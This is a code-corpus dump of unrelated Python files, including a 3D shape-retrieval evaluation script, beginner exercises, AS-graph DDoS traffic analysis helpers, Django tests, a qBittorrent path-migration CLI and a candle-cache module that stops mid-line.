RetrievalNet(self.cfg)\n\n self.normal_tf = transform.ImageNormalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n self.size = self.cfg.data.pix_size\n self.dim = self.cfg.models.z_dim\n self.view_num = self.cfg.data.view_num\n\n self.loading(self.cfg.models.pre_trained_path)\n \n\n def loading(self, paths=None):\n if paths == None or not os.path.exists(paths): \n print('No ckpt!')\n exit(-1)\n else:\n # loading\n ckpt = jt.load(paths)\n self.retrieval_net.load_state_dict(ckpt)\n print('loading %s successfully' %(paths))\n\n\n def test_steps(self):\n # 缩小一下 model 的大小,然后再计算\n '''\n 1. 先按照 json 中的cat来分类,把同一类的聚集起来\n 2. 按照 类 来遍历,将Top1的结果保存\n 3. 
根据需求,是否需要计算IoU和Haus; 如果需要这两个数字,则遍历Top1结果\n '''\n cfg = self.cfg\n self.retrieval_net.eval()\n\n # datasets for no model embeddings repeating training\n is_aug = cfg.setting.is_aug\n cfg.setting.is_aug = False\n shape_dataset = ShapeDataset(cfg=cfg)\n # shape_loader = torch.utils.data.DataLoader(dataset=shape_dataset, \\\n # batch_size=cfg.data.batch_size, shuffle=False, \\\n # drop_last=False, num_workers=cfg.data.num_workers)\n shape_loader = ShapeDataset(cfg=cfg).set_attrs(batch_size=cfg.data.batch_size, shuffle=False, num_workers=cfg.data.num_workers, drop_last=False)\n cfg.setting.is_aug = is_aug\n\n\n name_src = 'compcars'\n name_tar = 'compcars'\n roots = '../data'\n is_iou_haus = True\n roots_src = os.path.join(roots, name_src)\n roots_tar = os.path.join(roots, name_tar)\n \n\n shape_cats_list = []\n shape_inst_list = []\n shape_ebd_list = []\n pbar = tqdm.tqdm(shape_loader)\n for meta in pbar:\n with jt.no_grad():\n rendering_img = meta['rendering_img']\n cats = meta['labels']['cat']\n instances = meta['labels']['instance']\n \n rendering = rendering_img.view(-1, 1, self.size, self.size)\n rendering_ebds = self.retrieval_net.get_rendering_ebd(rendering).view(-1, self.view_num, self.dim)\n shape_cats_list += cats\n shape_inst_list += instances\n shape_ebd_list.append(rendering_ebds)\n \n shape_ebd = jt.concat(shape_ebd_list, dim=0) # num, 12, dim\n\n # test image\n json_dict = read_json(os.path.join(cfg.data.data_dir, cfg.data.test_json))\n # json_dict = json_dict[:10]\n # json_lenth = len(json_dict)\n query_transformer = transform.Compose([transform.ToTensor(), transform.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n mask_transformer = transform.Compose([transform.ToTensor(), transform.Normalize((0.5, ), (0.5, ))])\n bs = shape_ebd.shape[0]\n\n # sorted as category \n cats_dict = {}\n for items in json_dict:\n cat = items['category']\n try:\n cats_dict[cat].append(items)\n except:\n cats_dict[cat] = []\n cats_dict[cat].append(items)\n\n iou_dict = {}\n haus_dict = {}\n top1_dict = {}\n topk_dict = {}\n category_dict = {}\n record_dict = {}\n\n for cat in cats_dict.keys():\n cats_list = cats_dict[cat]\n iou_dict[cat] = [0 for i in range(len(cats_list))]\n haus_dict[cat] = [0 for i in range(len(cats_list))]\n top1_dict[cat] = [0 for i in range(len(cats_list))]\n topk_dict[cat] = [0 for i in range(len(cats_list))]\n category_dict[cat] = [0 for i in range(len(cats_list))]\n record_dict[cat] = []\n\n with jt.no_grad():\n pbar = tqdm.tqdm(cats_list) \n for i, info in enumerate(pbar):\n # info = json_dict[i]\n query_img = query_transformer(Image.open(os.path.join(cfg.data.data_dir, info['img'])))\n mask_img = mask_transformer(Image.open(os.path.join(cfg.data.data_dir, info['mask'])))\n\n query = jt.concat((query_img, mask_img), dim=0)\n query = query.unsqueeze(dim=0)\n query_ebd = self.retrieval_net.get_query_ebd(query)\n\n \n query_ebd = query_ebd.repeat(bs, 1, 1)\n _, weights = self.retrieval_net.attention_query(query_ebd, shape_ebd)\n queried_rendering_ebd = jt.nn.bmm(weights, shape_ebd)\n qr_ebd = queried_rendering_ebd\n qi_ebd = query_ebd\n prod_mat = (qi_ebd * qr_ebd).sum(dim=2)\n max_idx = prod_mat.argmax(dim=0)\n\n\n pr_cats = shape_cats_list[max_idx[0]]\n pr_inst = shape_inst_list[max_idx[0]]\n \n gt_cats = info['category']\n gt_inst = info['model'].split('/')[-2]\n \n if gt_cats == pr_cats:\n category_dict[cat][i] = 1\n\n if gt_inst == pr_inst:\n top1_dict[cat][i] = 1\n\n record_dict[cat].append((pr_cats, pr_inst, gt_cats, gt_inst))\n\n \n\n max_idx = 
prod_mat.view(-1).topk(dim=0, k=10)[1]\n for kk in range(10):\n pr_cats = shape_cats_list[max_idx[kk]]\n pr_inst = shape_inst_list[max_idx[kk]]\n if gt_cats == pr_cats and gt_inst == pr_inst:\n topk_dict[cat][i] = 1\n break\n \n\n # basic output: top1, top10, cats, total number\n out_info = []\n total_info = {}\n for cat in cats_dict.keys():\n length = len(top1_dict[cat])\n out_info.append('%s: top1: %d, top10: %d, cats: %d, top1_rt: %.3f, top10_rt: %.3f, cats_rt: %.3f, total num: %d\\\n ' %(cat, sum(top1_dict[cat]), sum(topk_dict[cat]), sum(category_dict[cat]),\n sum(top1_dict[cat])/length, sum(topk_dict[cat])/length, \n sum(category_dict[cat])/length, length))\n \n total_info[cat] = []\n total_info[cat].append(sum(top1_dict[cat]))\n total_info[cat].append(sum(topk_dict[cat]))\n total_info[cat].append(sum(category_dict[cat]))\n total_info[cat].append(length)\n for msg in out_info:\n print(msg)\n \n total_top1 = sum([total_info[cat][0] for cat in cats_dict.keys()])\n total_top10 = sum([total_info[cat][1] for cat in cats_dict.keys()])\n total_cats = sum([total_info[cat][2] for cat in cats_dict.keys()]) \n total_length = sum([total_info[cat][3] for cat in cats_dict.keys()]) \n print('%s: top1: %d, top10: %d, cats: %d, top1_rt: %.3f, top10_rt: %.3f, cats_rt: %.3f, total num: %d\\n\\\n ' %('[Total]', total_top1, total_top10, total_cats,\n total_top1/total_length, total_top10/total_length, \n total_cats/total_length, total_length))\n\n\n return record_dict\n if is_iou_haus:\n print('>>>>>>>>[calculating haus and iou]<<<<<<<<')\n # In order to speed up, we use multiprocessing here\n \n cal_iou_haus(record_dict, roots_src, roots_tar, iou_dict, haus_dict, cats_dict)\n\n out_info = []\n total_info = {}\n for cat in cats_dict.keys():\n length = len(iou_dict[cat])\n out_info.append('%s: haus: %.4f, iou: %.4f,\\n\\\n ' %(cat, sum(haus_dict[cat])/length, sum(iou_dict[cat])/length, length))\n \n total_info[cat] = []\n total_info[cat].append(sum(haus_dict[cat]))\n total_info[cat].append(sum(iou_dict[cat]))\n total_info[cat].append(length)\n for msg in out_info:\n print(msg)\n \n total_haus = sum([total_info[cat][0] for cat in cats_dict.keys()])\n total_iou = sum([total_info[cat][1] for cat in cats_dict.keys()])\n total_length = sum([total_info[cat][2] for cat in cats_dict.keys()]) \n print('%s: haus: %.4f, iou: %.4f: %d\\n\\\n ' %('[Total]', total_haus/total_length, \n total_iou/total_length, total_length))\n\n\n\n@contextmanager\ndef poolcontext(*args, **kwargs):\n pool = multiprocessing.Pool(*args, **kwargs)\n yield pool\n pool.terminate()\n\n\ndef func(zips):\n ki, record = zips\n name_src = 'stanfordcars'\n name_tar = 'stanfordcars'\n roots = '../data'\n roots_src = os.path.join(roots, name_src)\n roots_tar = os.path.join(roots, name_tar) \n\n # pr_cats, pr_inst, gt_cats, gt_inst = record_dict['car'][ki] \n pr_cats, pr_inst, gt_cats, gt_inst = record\n src_binvox_path = os.path.join(roots_src, 'model_std_bin128', gt_cats, '%s.binvox'%(gt_inst,))\n tar_binvox_path = os.path.join(roots_tar, 'model_std_bin128', pr_cats, '%s.binvox'%(pr_inst,))\n\n with open(src_binvox_path, 'rb') as f:\n src_bin = binvox_rw.read_as_3d_array(f).data\n \n with open(tar_binvox_path, 'rb') as f:\n tar_bin = binvox_rw.read_as_3d_array(f).data\n\n # IoU\n Iou_st = np.sum(src_bin & tar_bin) / np.sum((src_bin | tar_bin) + 1e-8)\n # Haus\n src_ptc_path = os.path.join(roots_src, 'model_std_ptc10k_npy', gt_cats, '%s.npy'%(gt_inst,))\n tar_ptc_path = os.path.join(roots_tar, 'model_std_ptc10k_npy', pr_cats, '%s.npy'%(pr_inst,))\n\n 
src_ptc = np.load(src_ptc_path)[:5000]\n tar_ptc = np.load(tar_ptc_path)[:5000]\n src_ptc = src_ptc/2\n tar_ptc = tar_ptc/2 \n\n Haus_st = averaged_hausdorff_distance(src_ptc, tar_ptc)\n if ki % 500 == 0:\n print(ki)\n\n return Haus_st, Iou_st \n\n\nif __name__ == '__main__':\n import yaml\n import argparse\n with open('./configs/stanfordcars.yaml', 'r') as f:\n config = yaml.load(f)\n def dict2namespace(config):\n namespace = argparse.Namespace()\n for key, value in config.items():\n if isinstance(value, dict):\n new_value = dict2namespace(value)\n else:\n new_value = value\n setattr(namespace, key, new_value)\n return namespace\n config = dict2namespace(config)\n\n\n config.models.pre_trained_path = './pre_trained/stanfordcars.pt'\n\n ret = Retrieval(config)\n record_dict = ret.test_steps()\n\n \n\n is_iou_haus = True\n if is_iou_haus:\n iou_dict = {}\n haus_dict = {}\n par_num = 20 \n for cat in record_dict.keys():\n nums = [i for i in range(len(record_dict[cat]))]\n records = [record_dict[cat][i] for i in range(len(record_dict[cat]))] \n with poolcontext(processes=par_num) as pool:\n rt = pool.map(func, zip(nums, records))\n\n # print(rt)\n iou_dict[cat] = []\n haus_dict[cat] = []\n for haus, iou in rt:\n iou_dict[cat].append(iou) \n haus_dict[cat].append(haus)\n\n \n out_info = []\n total_info = {}\n for cat in record_dict.keys():\n length = len(iou_dict[cat])\n out_info.append('%s: haus: %.4f, iou: %.4f,\\\n ' %(cat, sum(haus_dict[cat])/length, sum(iou_dict[cat])/length))\n \n total_info[cat] = []\n total_info[cat].append(sum(haus_dict[cat]))\n total_info[cat].append(sum(iou_dict[cat]))\n total_info[cat].append(length)\n for msg in out_info:\n print(msg)\n \n total_haus = sum([total_info[cat][0] for cat in record_dict.keys()])\n total_iou = sum([total_info[cat][1] for cat in record_dict.keys()])\n total_length = sum([total_info[cat][2] for cat in record_dict.keys()]) \n print('%s: haus: %.4f, iou: %.4f: %d\\n\\\n ' %('[Total]', total_haus/total_length, \n total_iou/total_length, total_length))\n # pass\n\n\n\n","sub_path":"code/RetrievalNet_test.py","file_name":"RetrievalNet_test.py","file_ext":"py","file_size_in_byte":14580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"205522868","text":"continuar = True\nwhile continuar:\n print (\"--------------------------------------------------------------\")\n print (\"\"\"\\t\\t\\tCALCULA DEZENAS \"\"\")\n print (\"\"\"\\t\\t\\t---------------\"\"\")\n\n print ()\n\n print (\"\"\"DESCRIÇÃO: Informa quantas dezenas há em um número qualquer.\"\"\")\n print ()\n print (\"\"\"SAIR: Digite S, s ou sair\"\"\")\n print (\"--------------------------------------------------------------\")\n print (\"\\n\")\n\n while True:\n numero = input(\"Digite um número: \")\n try:\n numero = abs(float(numero))\n break\n except ValueError:\n if numero in ['s', 'S', 'sair']:\n continuar = False\n break\n print (\"\\nValor invalido, por favor digite apenas números\")\n finally:\n print (\"\\n\")\n\n if not continuar:\n break\n\n aux = numero\n\n qtd_dezenas = 0\n while numero >= 10:\n qtd_dezenas +=1\n numero -=10\n\n saida = \"SAIDA: \"\n saida += str(aux) + \" tem \" + str(qtd_dezenas) + \" dezena\"\n\n if qtd_dezenas >1:\n saida += \"s\"\n\n print (saida)\n\n\nprint (\"FIM DO PROGRAMA\")\n","sub_path":"ProgramasPython/qtd_dezenas.py","file_name":"qtd_dezenas.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"28809495","text":"## PIG LATIN TRANSLATOR ##\r\n\r\n## PROJECT STRUCTURE ##\r\n\r\n# Notes: A Welcome message is displayed to the user.\r\nprint(\"\\nWelcome to the Pig Latin Translator! Here you will be able to convert any sentence into Pig Latin!\")\r\n\r\n# Notes: Creating a string by getting input from the user which will be used later and translated into Pig Latin. The strip() function is used to remove any whitespace,\r\n# and the lower() function is used to convert the entire string to lowercase\r\noriginal = input(\"\\nPlease enter the sentence you would like translated.\\nSentence: \")\r\n\r\n# Notes: Creating a list by using the split() function on the \"original\" string\r\noriginal_list = original.split()\r\n\r\n# Notes: Below I create an empty list which will store the translated words.\r\nnew_list = []\r\n\r\n# Notes: Creating a for-loop that will run through each word in original_list and translate and append it accordingly.\r\nfor word in original_list:\r\n \r\n # Notes: if-statement that will add \"yay\" to the end of words in original_sentence that start with a vowel, and append it to new_list\r\n if word[0] in \"aeiou\":\r\n new_word = word + \"yay\"\r\n new_list.append(new_word)\r\n \r\n # Notes: An else-statement that will run in the case that the word doesn't start with a vowel. Each time the loop runs, a temporary variable called vowel_position\r\n # with a 0 value is created. This will later be used to determine the index location of the first vowel in the word.\r\n else:\r\n vowel_position = 0\r\n \r\n # Notes: A for-loop that will itirate through each letter in words not starting with a vowel. For each consonant counted, the value of vowel_position is increased by 1.\r\n # This will run continuously until the loop encounters the first vowel in the word.\r\n for letter in word:\r\n if letter not in \"aeiou\":\r\n vowel_position = vowel_position + 1\r\n else:\r\n break\r\n # Notes: Temporary variables created withing the for-loop in order to create the translated word. The \"consonant\" variable saves the part of the word after the index\r\n # position of \"vowel_position, and \"the_rest saves the part of the word up until the index value of \"vowel_position\".\r\n consonant = word[:vowel_position]\r\n the_rest = word[vowel_position:]\r\n new_word = the_rest + consonant + \"ay\"\r\n new_list.append(new_word)\r\n\r\ntranslated = \" \".join(new_list)\r\n\r\nprint(translated)\r\n","sub_path":"pig_latin_translator.py","file_name":"pig_latin_translator.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"134011152","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 12 22:32:01 2020\n\n@author: kisho\n\"\"\"\n\n# 1 REVERSE THE STRING \nword = \"Kishore\" \nprint(word[::-1])\nword = \"kishore\"[::-1]\nprint(word)\n \n# 2 SWAP THE CASES \nword = \"KiSHorE\"\nprint(word.swapcase())\n\nword = \"KiSHorE\"\nname = []\nfor i in word: \n if i.isupper():\n name.append(i.lower())\n elif i.islower():\n name.append(i.upper())\n else:\n name.append(i)\ncaseword = ''.join(name)\nprint(caseword)\n\n\n# 3 count the occurance of the string \nwordy=\"kishore\"\nd = {}\nfor i in wordy:\n \n if i in d:\n \n d[i]+=1\n else:\n d[i]=1\n \nprint(d)\n\n# 4 \nfor i in range(1,51):\n print(i)\n if i %2 == 0:\n print(\"EVEN :\" ,i)\n else:\n print(\"ODD :\" ,i)\n \n\n# 5 \nfor i in range(1,51):\n if i%3 ==0 and i%5 == 0:\n print(i, \"fizz-buzz\")\n elif i %3 == 0: \n print(i , \"fizz\")\n elif i % 5 == 0:\n print(i , \"buzz\")\n\n else: \n print(i)\n \n\n# 6 \nvowels = \"aeiou\"\nword = \"accenture\"\nfor i in word: \n count = 0\n if i in vowels: \n count+=1\n print(i,count)\n\n\n# 7 \nword = \"ga24nbv2k6jg523jg2545lsfwe\"\nsum = 0\nletter = []\nfor i in word:\n if i.isdigit():\n sum = sum + int(i)\n else: \n letter.append(i)\nprint(\"Sum is :\",sum,\" Characters is : \",letter)\n\n#8 \nnumber = []\nfor i in range(1,11):\n number.append(i)\nprint(number)\nn = len(number)\nsum = 9\nfor i in range(0,n):\n for j in range(0,n):\n if(number[i]+number[j] == sum):\n print(number[i],\" \", number[j])\n\n# 9 \nw1 = \"add\"\nw2 = \"dad\"\nif(sorted(w1)==sorted(w2)):\n print(\"it is anagram\" )\nelse:\n print(\"it is not an anagram\")\n\n#10\na = 11 \nfor i in range(2,int(a/2)):\n if a%i == 0:\n print(\"its not a prime\")\n break\nelse:\n print(\"its a prime\")\n\n\n# 11 \nword = (1,2,3,4,5)\n# new = word + (6,)\n\nneww = list(word)\nneww.append(6)\nprint(tuple(neww))\n\n#12 \na = input()\nrev = a[::-1]\nif a == rev:\n print(\"it is palindrome \" )\nelse:\n print(\"it is not palindrome \")\n\n# 13 \nnum = 11\nfor i in range(0,21):\n print(num ,\" x \", i, \" = \", num*i)\n\n# 14 \n\nn1 =0\nn2 =1 \nn =0\nwhile(n<50):\n print(n)\n n = n1 +n2\n n1 = n2\n n2 = n \n \n# 15 \ns = []\nsentence = \"this-is-the-program-a-to-sort-with-hyphen\"\nfor i in sentence.split(\"-\"):\n s.append(i)\ns.sort()\nprint('-'.join(s))\n\n# 16 \nli = [1,2,3,3,3,3,4,5]\nnew = []\nfor i in li:\n if i not in new:\n new.append(i)\n \nprint(new)\n\n# 17 \nalpha = \"abcdefghijklmnopqrstuvwxyz\"\nword = \"IHFJSADFAJSDFsdnff\"\nfor c in alpha:\n if c not in word:\n print(\"it is not a pangram\")\n break;\nelse: \n print(\"it is a pangram\")\n\n# 18 \nnum = []\nfor i in range(0,5):\n v = int(input(\"Enter the integer :\"))\n num.append(v)\nnum.sort(reverse = True)\nfor i in range(0,5):\n if num[i] %2 != 0:\n print(num[i])\n break\n \n#19 \n\nr = int(input(\"Enter the radius in integer\"))\narea = 3.14*r*r\nprint(area) \n\n#20 \ndef fact(n):\n if n==0 or n==1:\n return 1\n else:\n return n* fact(n-1)\n\nprint(fact(5))\n\n\n","sub_path":"python-practice/PyAccent1.py","file_name":"PyAccent1.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"429187996","text":"a = input(\"문장을 입력하세요: \")\n\nindex = 0\nfor i in a:\n if i == '.':\n a = a[:index + 1]\n index += 1\n\nif a[0] == \"저\":\n if a[-4:] == \"합니다.\":\n a = a[3:-8]\n elif a[-4:] == \"입니다.\":\n a= a[3:-4]\nelse:\n a = a[6:-4]\n\nprint(\"이름 :\",a)\n\n\n#ㅎ노자 다시 안보고 짜보기","sub_path":"2nd_assginment2.py","file_name":"2nd_assginment2.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"429287853","text":"import json\nimport random\nimport multiprocessing\nimport pyasn\nfrom matplotlib import pyplot as plt\nfrom pytricia import PyTricia\nfrom networkx import DiGraph, Graph\nimport pandas as pd\nimport numpy as np\n\nfrom eval_ddos_utils import load_as_graph\n\n\ndef stat():\n alldf = []\n for i in range(19):\n df = pd.read_csv(\"/home/yutao/Desktop/data-dns-dsr6059\" + \"/\" + str(i) + \".csv\", dtype=str);\n alldf.append(df)\n df = pd.concat(alldf, axis=0, ignore_index=True)\n df1 = df[df['src_port'] == '53']\n df2 = df1[df1['dst'] == '144.154.222.228']\n a = np.array(df2.iplen.astype(int))\n b = a+14\n t1 = b.sum()\n print(t1/1996/(1000*1000)*8, \"Mbps\") # 0.574 Mbps\n df1iplen = df1.iplen.astype(int)\n t2 = df1iplen.sum()\n print(t2 / 1996 / (1000 * 1000) * 8, \"Mbps\") # 0.569 Mbps\n df3 = df[df['dst_port'] == '53']\n df3iplen = df3.iplen.astype(int)\n t3 = df3iplen.sum()\n print(t3 / 1996 / (1000 * 1000) * 8, \"Mbps\") # 0.002 Mbps\n df4 = df3[df3['src']=='144.154.222.228']\n\n\ndef dns_server_dist_plot():\n nameservers = pd.read_csv(\"data/nameservers.csv\", dtype=str)\n country = nameservers.columns[2]\n ip = nameservers.columns[0]\n d = nameservers[[country, ip]]\n num_list = d.groupby(country).count()[ip]\n num_list = num_list.sort_values(0,False)\n x=[]; y=[]\n for i in range(30):\n x.append(str(num_list.index[i]))\n y.append(num_list[i])\n xv = list(range(30))\n plt.bar(xv,y)\n plt.xticks(xv,x)\n plt.show()\n\n\n\ndef get_tier1_as():\n g = load_as_graph()\n ret = []\n for i in g.nodes:\n if all(adj['rel']!='cp' for adj in g.adj[i].values()):\n ret.append(i)\n return ret\n\n\ndef main1():\n import random\n c_as = 6075\n # a=\"./lb_eval.py 1 data/20181201.as-rel.txt /home/pcl/8LStudentYuHaitao/tmp/jenson/flow-stats.70min.0.csv %d > result/1-1-23.txt &\"%c_as\n # print(a)\n b = \"./lb_eval.py 4 data/20181201.as-rel.txt /home/pcl/8LStudentYuHaitao/tmp/jenson/flow-stats.70min.0.csv %d %s > result/%d-4-%d.txt\"\n\n TIER1 = [7018, 209, 3356, 3549, 4323, 3320, 3257, 4436, 286, 6830, 2914, 5511, 3491, 1239, 6453, 6762, 12956, 1299,\n 701, 702, 703, 2828, 6461]\n\n MAXITEM = 50\n ruleslist = []\n inc_sel_list = []\n\n output = []\n\n for n in range(1, 24):\n if len(inc_sel_list)==0:\n if len(TIER1)>MAXITEM:\n sel = random.sample(TIER1, MAXITEM)\n else:\n sel = TIER1\n all_set = set(TIER1)\n for item in sel:\n one_set = {item}\n inc_sel_list.append((one_set, all_set-one_set))\n else:\n old_len = len(inc_sel_list)\n while len(inc_sel_list) result/1-1-23.txt &\"%c_as\n # print(a)\n b = \"./lb_eval.py 4 data/20181201.as-rel.txt /home/pcl/8LStudentYuHaitao/tmp/jenson/flow-stats.70min.0.csv %d > result/%d.txt\"\n\n ruleslist = []\n\n df = pd.read_csv('data/multihoming_stubs_flow_stats.csv',dtype=str, header=None, names=[\"as\",\"c1\",\"c2\"])\n\n for n in range(501, 1001):\n asn = df[\"as\"][n-1]\n asn = int(asn)\n cmd = b%(asn,asn)\n target = \"result/%d.txt\"%asn\n ruleslist.append((target, cmd))\n # print(ruleslist)\n\n print(\"all:%s\"%(\" \".join(a[0] for a in ruleslist)))\n\n for target, cmd in ruleslist:\n print(\"%s:\"%target)\n print(\"\\t%s\"%cmd)\n\n\ndef main3():\n ruleslist = []\n df = pd.read_csv('data/multihoming_stubs_flow_stats.csv',dtype=str, header=None, names=[\"as\",\"c1\",\"c2\"])\n for n in range(1, 1001):\n asn = df[\"as\"][n-1]\n asn = int(asn)\n target = \"result-stability/%d.txt\" % asn\n cmd = \"python3 stability_analysis.py data/20181201.as-rel.txt %d 20 > %s\"%(asn,target)\n ruleslist.append((target, cmd))\n\n print(\"all:%s\"%(\" 
\".join(a[0] for a in ruleslist)))\n\n for target, cmd in ruleslist:\n print(\"%s:\"%target)\n print(\"\\t%s\"%cmd)\n\n\ndef main():\n ruleslist = []\n df = pd.read_csv('data/multihoming_stubs_flow_stats.csv',dtype=str, header=None, names=[\"as\",\"c1\",\"c2\"])\n for n in range(1, 51):\n asn = df[\"as\"][n-1]\n asn = int(asn)\n if asn==21899:\n continue\n target = \"result-lb-eval/%d.txt\" % asn\n cmd = \"python3 lb_eval_fork.py 4 data/20181201.as-rel.txt /home/pcl/8LStudentYuHaitao/tmp/jenson/flow-stats.70min.0.csv %d\"%(asn)\n ruleslist.append((target, cmd))\n\n print(\"all:%s\"%(\" \".join(a[0] for a in ruleslist)))\n\n for target, cmd in ruleslist:\n print(\"%s:\"%target)\n print(\"\\t%s\"%cmd)\n\n\n\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"eval_ddos_trial.py","file_name":"eval_ddos_trial.py","file_ext":"py","file_size_in_byte":6025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"415356328","text":"from django.urls import reverse\nfrom django.test import TestCase\n\nfrom .models import Mineral\n\n\n# Create your tests here.\nclass CourseViewsTests(TestCase):\n def setUp(self):\n self.mineral = Mineral.objects.create(\n name='Test',\n image_filename='Test',\n image_caption='Test',\n category='Test',\n formula='Test',\n strunz_classification='Test',\n crystal_system='Test',\n unit_cell='Test',\n color='Test',\n crystal_symmetry='Test',\n cleavage='Test',\n mohs_scale_hardness='Test',\n luster='Test',\n streak='Test',\n diaphaneity='Test',\n optical_properties='Test',\n group='Test',\n refractive_index='Test',\n crystal_habit='Test',\n specific_gravity='Test',\n )\n\n self.mineral2 = Mineral.objects.create(\n name='Test2',\n image_filename='Test2',\n image_caption='Test2',\n category='Test2',\n formula='Test2',\n strunz_classification='Test2',\n crystal_system='Test2',\n unit_cell='Test2',\n color='Test2',\n crystal_symmetry='Test2',\n cleavage='Test2',\n mohs_scale_hardness='Test2',\n luster='Test2',\n streak='Test2',\n diaphaneity='Test2',\n optical_properties='Test2',\n group='Test2',\n refractive_index='Test2',\n crystal_habit='Test2',\n specific_gravity='Test2',\n )\n\n def test_mineral_index_view(self):\n resp = self.client.get(reverse('minerals:index'))\n self.assertEqual(resp.status_code, 200)\n self.assertIn(self.mineral, resp.context['minerals'])\n self.assertIn(self.mineral2, resp.context['minerals'])\n self.assertTemplateUsed(resp, 'index.html')\n self.assertContains(resp, self.mineral.name)\n\n def test_mineral_detail_view(self):\n resp = self.client.get(reverse('minerals:detail',\n kwargs={'pk': self.mineral.pk}))\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(self.mineral, resp.context['mineral'])\n","sub_path":"minerals/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"402268906","text":"import logging\nimport argparse\n\nfrom . import QBTBatchMove, discover_bt_backup_path\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-e', '--existing-path', help='Existing root of path to look for.')\n parser.add_argument('-n', '--new-path', help='New root path to replace existing root path with.')\n parser.add_argument('-t', '--target-os', help='Target OS (converts slashes). '\n 'Default will auto-detect if conversion is needed '\n 'based on existing vs new.',\n choices=['Windows', 'Linux', 'Mac'])\n parser.add_argument('-b', '--bt-backup-path', help='BT_Backup Path Override. Default is %s'\n % discover_bt_backup_path())\n parser.add_argument('-s', '--skip-bad-files', help='Skips bad .fastresume files instead of exiting. '\n 'Default behavior is to exit.',\n action='store_true', default=False)\n\n parser.add_argument('-l', '--log-level', help='Log Level, Default is INFO.',\n choices=['DEBUG', 'INFO'], default='INFO')\n\n return parser.parse_args()\n\n\ndef main():\n args = parse_args()\n logging.basicConfig()\n logger.setLevel(args.log_level)\n logging.getLogger('qbt_migrate').setLevel(args.log_level)\n logging.getLogger('qbt_migrate').propagate = True\n qbm = QBTBatchMove()\n if args.bt_backup_path is not None:\n qbm.bt_backup_path = args.bt_backup_path\n else:\n bt_backup_path = input('BT_Backup Path (%s): ' % qbm.bt_backup_path)\n if bt_backup_path.strip():\n qbm.bt_backup_path = bt_backup_path\n if args.existing_path is None:\n args.existing_path = input('Existing Path: ')\n if args.new_path is None:\n args.new_path = input('New Path: ')\n if args.target_os is None:\n args.target_os = input('Target OS (Windows, Linux, Mac, Blank for auto-detect): ')\n if args.target_os.strip() and args.target_os.lower() not in ('windows', 'linux', 'mac'):\n raise ValueError('Target OS is not valid. Must be Windows, Linux, or Mac. Received: %s' % args.target_os)\n elif not args.target_os.strip():\n if '/' in args.existing_path and '\\\\' in args.new_path:\n logger.info('Auto detected target OS change. Will convert slashes to Windows.')\n args.target_os = 'windows'\n elif '\\\\' in args.existing_path and '/' in args.new_path:\n logger.info('Auto detected target OS change. Will convert slashes to Linux/Mac.')\n args.target_os = 'linux'\n else:\n args.target_os = None\n qbm.run(args.existing_path, args.new_path, args.target_os, args.skip_bad_files)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"qbt_migrate/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"615916649","text":"import datetime\nimport logging\nimport os\n\nimport pandas as pd\nfrom django.db import transaction\nfrom django.db.models import Count\nfrom django.db.models.functions import TruncDate\n\nfrom quant_candles.constants import Frequency\nfrom quant_candles.exchanges import candles_api\nfrom quant_candles.lib import (\n get_existing,\n get_min_time,\n get_next_time,\n has_timestamps,\n iter_timeframe,\n validate_data_frame,\n)\nfrom quant_candles.models import Candle, CandleCache, Symbol, TradeData\nfrom quant_candles.models.trades import upload_trade_data_to\nfrom quant_candles.utils import gettext_lazy as _\n\nlogger = logging.getLogger(__name__)\n\n\ndef convert_candle_cache_to_daily(candle: Candle):\n \"\"\"Convert candle cache, by minute or hour, to daily.\n\n * Convert, from past to present, in order.\n \"\"\"\n candle_cache = CandleCache.objects.filter(candle=candle)\n last_daily_cache = (\n candle_cache.filter(frequency=Frequency.DAY)\n .only(\"timestamp\")\n .order_by(\"-timestamp\")\n .first()\n )\n if last_daily_cache:\n hourly_or_minute_cache = candle_cache.filter(\n timestamp__lt=last_daily_cache.timestamp, frequency__lt=Frequency.DAY\n )\n unique_dates = (\n hourly_or_minute_cache.annotate(date=TruncDate(\"timestamp\"))\n .values(\"date\")\n .annotate(unique=Count(\"date\"))\n )\n if unique_dates.count() <= 1:\n timestamp_from = last_daily_cache.timestamp\n else:\n timestamp_from = (\n hourly_or_minute_cache.only(\"timestamp\").first().timestamp_from\n )\n else:\n any_cache = candle_cache.only(\"timestamp\").first()\n if any_cache:\n timestamp_from = any_cache.timestamp\n else:\n timestamp_from = None\n if timestamp_from:\n timestamp_to = candle_cache.only(\"timestamp\").last().timestamp\n for daily_ts_from, daily_ts_to in iter_timeframe(\n get_min_time(timestamp_from, value=\"1d\"),\n get_next_time(timestamp_to, value=\"1d\"),\n value=\"1d\",\n ):\n delta = daily_ts_to - daily_ts_from\n total_minutes = delta.total_seconds() / Frequency.HOUR\n if total_minutes == Frequency.DAY:\n target_cache = CandleCache.objects.filter(\n candle=candle,\n timestamp__gte=daily_ts_from,\n timestamp__lt=daily_ts_to,\n frequency__lt=Frequency.DAY,\n )\n existing = get_existing(target_cache.values(\"timestamp\", \"frequency\"))\n if has_timestamps(daily_ts_from, daily_ts_to, existing):\n with transaction.atomic():\n daily_cache, created = CandleCache.objects.get_or_create(\n 